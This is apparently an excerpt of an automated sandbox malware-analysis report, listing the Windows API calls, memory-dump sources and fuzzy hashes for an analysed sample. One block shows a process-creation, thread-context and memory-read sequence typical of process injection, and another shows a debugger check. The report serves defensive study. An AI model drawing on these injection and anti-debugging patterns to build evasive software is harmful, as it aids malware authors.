                                                                        • RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,0090F507,?,0000000E), ref: 0091399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 1372826849-0
                                                                        • Opcode ID: 9490246386df8196a59e7d9f13380edf71689f942e7d9b3e01ba8c70e716e779
                                                                        • Instruction ID: 63f192b6afbf617b9fa4a5a7bd7c9ed2c311996f91583f0d381c7521f94c8bf9
                                                                        • Opcode Fuzzy Hash: 9490246386df8196a59e7d9f13380edf71689f942e7d9b3e01ba8c70e716e779
                                                                        • Instruction Fuzzy Hash: A601F53635921DEAE6223B74DC42BEE736C9FC1760F208125F5059B292DFB4DDC086A0
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0093C385,?,?,?,?,?,00000004), ref: 0093C6F2
                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0093C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0093C708
                                                                        • CloseHandle.KERNEL32(00000000,?,0093C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0093C70F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleTime
                                                                        • String ID:
                                                                        • API String ID: 3397143404-0
                                                                        • Opcode ID: ec0134e924f0d5d0a9f4549add86b617cfb9956e906917019c4607db58b0d763
                                                                        • Instruction ID: 1b8fc610f218ceb38659446bb3ec6eb636a98dfe04dd031727ee4ebe3ddf751e
                                                                        • Opcode Fuzzy Hash: ec0134e924f0d5d0a9f4549add86b617cfb9956e906917019c4607db58b0d763
                                                                        • Instruction Fuzzy Hash: A5E08633145214B7D7212B54AC09FCE7B29AF05B61F104110FB19790E097B125519B98
                                                                        APIs
                                                                        • _free.LIBCMT ref: 0093BB72
                                                                          • Part of subcall function 00911C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00917A85), ref: 00911CB1
                                                                          • Part of subcall function 00911C9D: GetLastError.KERNEL32(00000000,?,00917A85), ref: 00911CC3
                                                                        • _free.LIBCMT ref: 0093BB83
                                                                        • _free.LIBCMT ref: 0093BB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                        • Instruction ID: 3f1e2647dd94bb6c96de4de28f02c0353b626eccd342f341bead880bbe699a62
                                                                        • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                        • Instruction Fuzzy Hash: BEE0C2A130074452CA2065386E44FF763DC0F45310B04080DB699E3142CF20E88088E4
                                                                        APIs
                                                                          • Part of subcall function 008F22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008F24F1), ref: 008F2303
                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008F25A1
                                                                        • CoInitialize.OLE32(00000000), ref: 008F2618
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0096503A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                        • String ID:
                                                                        • API String ID: 3815369404-0
                                                                        • Opcode ID: 4999e1771b1111bf235d8462cce164c733d7c585566a4271fc2abe1bdfa31ffa
                                                                        • Instruction ID: d9f2feb403f1e65449fbd6714578f9d17d54d9cb30d16316dfec17beaaa13181
                                                                        • Opcode Fuzzy Hash: 4999e1771b1111bf235d8462cce164c733d7c585566a4271fc2abe1bdfa31ffa
                                                                        • Instruction Fuzzy Hash: 7B71DCB48293458B8714EF6EABB0599BBE5FB983607D0432EE129C73B1DB704400EF55
                                                                        APIs
                                                                        • _strcat.LIBCMT ref: 009508FD
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • _wcscpy.LIBCMT ref: 0095098C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1012013722-0
                                                                        • Opcode ID: d0f03066d883fb9a191662cb42676b1c9176d91089a4bf1bf0a1a6078c6fee50
                                                                        • Instruction ID: 293bb5095010b37e12c465ea3d1574e35f10f3ca00c214e41db46706ace8b65f
                                                                        • Opcode Fuzzy Hash: d0f03066d883fb9a191662cb42676b1c9176d91089a4bf1bf0a1a6078c6fee50
                                                                        • Instruction Fuzzy Hash: 6E913434A00605DFCB18DF29C495AA9B7E5FF89311B54846AED5ACF3A2DB30ED45CB80
                                                                        APIs
                                                                        • IsThemeActive.UXTHEME ref: 008F3A73
                                                                          • Part of subcall function 00911405: __lock.LIBCMT ref: 0091140B
                                                                          • Part of subcall function 008F3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008F3AF3
                                                                          • Part of subcall function 008F3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008F3B08
                                                                          • Part of subcall function 008F3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008F3AA3,?), ref: 008F3D45
                                                                          • Part of subcall function 008F3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,008F3AA3,?), ref: 008F3D57
                                                                          • Part of subcall function 008F3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,009B1148,009B1130,?,?,?,?,008F3AA3,?), ref: 008F3DC8
                                                                          • Part of subcall function 008F3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,008F3AA3,?), ref: 008F3E48
                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008F3AB3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                        • String ID:
                                                                        • API String ID: 924797094-0
                                                                        • Opcode ID: 857728880402b8796403d773506f7a78890231d8983723b92e59e9e4624f3e27
                                                                        • Instruction ID: 114ce598be85e9f83a209675add8c767f65967cfb1dd3fc7762542e1ca27013e
                                                                        • Opcode Fuzzy Hash: 857728880402b8796403d773506f7a78890231d8983723b92e59e9e4624f3e27
                                                                        • Instruction Fuzzy Hash: 73116A7191C3559FC300EF29E949A1ABBE8EB94720F008A1EF584872A1DB709585DB92
                                                                        APIs
                                                                        • ___lock_fhandle.LIBCMT ref: 0091EA29
                                                                        • __close_nolock.LIBCMT ref: 0091EA42
                                                                          • Part of subcall function 00917BDA: __getptd_noexit.LIBCMT ref: 00917BDA
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                        • String ID:
                                                                        • API String ID: 1046115767-0
                                                                        • Opcode ID: 044ff18604f593d7f9288720d1cd4a9dc6bb321d1d63d36881d6d2c9a56d34de
                                                                        • Instruction ID: 16218b0c6892636edb2f5379fe34bc8debc10b44eb03c75c478055594c4c0ed8
                                                                        • Opcode Fuzzy Hash: 044ff18604f593d7f9288720d1cd4a9dc6bb321d1d63d36881d6d2c9a56d34de
                                                                        • Instruction Fuzzy Hash: 3711C672B4961D8AE711BFA4C9413D87A606FC1331F260340E8615F2E2C7B48DC0DAA5
                                                                        APIs
                                                                          • Part of subcall function 0091395C: __FF_MSGBANNER.LIBCMT ref: 00913973
                                                                          • Part of subcall function 0091395C: __NMSG_WRITE.LIBCMT ref: 0091397A
                                                                          • Part of subcall function 0091395C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,0090F507,?,0000000E), ref: 0091399F
                                                                        • std::exception::exception.LIBCMT ref: 0090F51E
                                                                        • __CxxThrowException@8.LIBCMT ref: 0090F533
                                                                          • Part of subcall function 00916805: RaiseException.KERNEL32(?,?,0000000E,009A6A30,?,?,?,0090F538,0000000E,009A6A30,?,00000001), ref: 00916856
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 3902256705-0
                                                                        • Opcode ID: 9f5ffcc955c0dfb7d8c7c98bca048cc2ae5ef537f74a0cff8a07e19ce0480c0f
                                                                        • Instruction ID: 7f47071a0a2783dfd44a93f8adffa3dff45ed19c4c0dfedb4f6eb4f6415ed230
                                                                        • Opcode Fuzzy Hash: 9f5ffcc955c0dfb7d8c7c98bca048cc2ae5ef537f74a0cff8a07e19ce0480c0f
                                                                        • Instruction Fuzzy Hash: 59F02D3260021D6BD724BF98DC22AEE77EC6F40354F208475F908D14C1CBB0D78482A5
                                                                        APIs
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        • __lock_file.LIBCMT ref: 00913629
                                                                          • Part of subcall function 00914E1C: __lock.LIBCMT ref: 00914E3F
                                                                        • __fclose_nolock.LIBCMT ref: 00913634
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2800547568-0
                                                                        • Opcode ID: 6234ceccd2d08f733bfac8b6dc704436943aff80f2fc05914f2950db808cec93
                                                                        • Instruction ID: 99dd80cc3103f7cf3e3cd197023a358d5b2f47c26a38833bec4ea2354a66b759
                                                                        • Opcode Fuzzy Hash: 6234ceccd2d08f733bfac8b6dc704436943aff80f2fc05914f2950db808cec93
                                                                        • Instruction Fuzzy Hash: 0AF09631B4520CAAD7116B6588077DE7AB45FC1774F25C108E425AB2C1C77C86819A95
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 012760D3
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01276169
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0127618B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1288344983.0000000001274000.00000040.00000020.00020000.00000000.sdmp, Offset: 01274000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1274000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                        • Instruction ID: 7c661d49672051287c337cdbfbb267915442e6defe4c8c5cdabfda0109ed1455
                                                                        • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                        • Instruction Fuzzy Hash: C912CE24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E85CB5A
                                                                        APIs
                                                                        • __flush.LIBCMT ref: 00912A0B
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __flush__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 4101623367-0
                                                                        • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                        • Instruction ID: f08c385bc35656f2631b2b65b1056a4b6220749fd61d5f24099daf1cbc34b570
                                                                        • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                        • Instruction Fuzzy Hash: 2B41857170070E9FDF28AF69C9815EE77AAAF84360F24852DE855C7280E674DDE18B44
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction ID: ae8c78f5b9259fb241efffc52a58e149ca4bf7de1aafdfdf83c933d85578715a
                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction Fuzzy Hash: 7531C475A00106DFD718DF58C490A69FBAAFF89340B648AA5E409CB2D6DB35EDC1CB90
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 9954227033557572d9ee409fe610f84f3a9dcc6e1a7467747340bc3076f8a0f0
                                                                        • Instruction ID: 6355f36dd8c6dc293e2265bb4289314503bcd2f371b71ece80a711d98ca75b24
                                                                        • Opcode Fuzzy Hash: 9954227033557572d9ee409fe610f84f3a9dcc6e1a7467747340bc3076f8a0f0
                                                                        • Instruction Fuzzy Hash: 38317075104528DFCB01EF12D09576E7BB0FF89321F10888AEAD55B395E774A90ACF81
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: c275ef9d64201445d65b2545c9a90ced1b8c44aef0779275d5fbf2d25eecd379
                                                                        • Instruction ID: 0bbd642682e4d51609ce44ef56037571aadc2a959a5e8031ff02a893061ab1da
                                                                        • Opcode Fuzzy Hash: c275ef9d64201445d65b2545c9a90ced1b8c44aef0779275d5fbf2d25eecd379
                                                                        • Instruction Fuzzy Hash: 75415E705047118FDB24DF24C454B1ABBE4BF85308F19895CE99A4B3A2C772F845CF52
                                                                        APIs
                                                                          • Part of subcall function 008F4214: FreeLibrary.KERNEL32(00000000,?), ref: 008F4247
                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008F39FE,?,00000001), ref: 008F41DB
                                                                          • Part of subcall function 008F4291: FreeLibrary.KERNEL32(00000000), ref: 008F42C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Free$Load
                                                                        • String ID:
                                                                        • API String ID: 2391024519-0
                                                                        • Opcode ID: b0077633db435374dd71259a6a2d4480768d13548e8d314030c5d507d64511c6
                                                                        • Instruction ID: b2d7833b84b0f6bafce586244872d6fe70457398f03d0788b3e65bc1d6b3a930
                                                                        • Opcode Fuzzy Hash: b0077633db435374dd71259a6a2d4480768d13548e8d314030c5d507d64511c6
                                                                        • Instruction Fuzzy Hash: 3911943160020EAADB10AB78DC06FAF77A9EF80704F10843AB696E61C1DB749A419B61
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 278e8e4b9def4c9e96dcd6046da40b349b31501877fd3bb2f3df991d9023195f
                                                                        • Instruction ID: d2faf3f5a2aa108beae27b0aa2e3b397c59556fd2d441661d3e491af98315424
                                                                        • Opcode Fuzzy Hash: 278e8e4b9def4c9e96dcd6046da40b349b31501877fd3bb2f3df991d9023195f
                                                                        • Instruction Fuzzy Hash: 45212370508705CFDB24DF28C854B2ABBF5BF85304F144968FA9A8B6A2C732E845CF52
                                                                        APIs
                                                                        • ___lock_fhandle.LIBCMT ref: 0091AFC0
                                                                          • Part of subcall function 00917BDA: __getptd_noexit.LIBCMT ref: 00917BDA
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                        • String ID:
                                                                        • API String ID: 1144279405-0
                                                                        • Opcode ID: 90a4efb1e9731595673eb36f8c7a94fd20feb333b915ad849206d5e4e18fb418
                                                                        • Instruction ID: 33c6410cfac8e2375c44ae6b0f3e53b2b7085896deb4078d8ba3ffd6ed2c537f
                                                                        • Opcode Fuzzy Hash: 90a4efb1e9731595673eb36f8c7a94fd20feb333b915ad849206d5e4e18fb418
                                                                        • Instruction Fuzzy Hash: E511B272B4960C8FE7126FA4C9413DD7A619FC5335F254740E4741B2E2C7B48DC09BA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
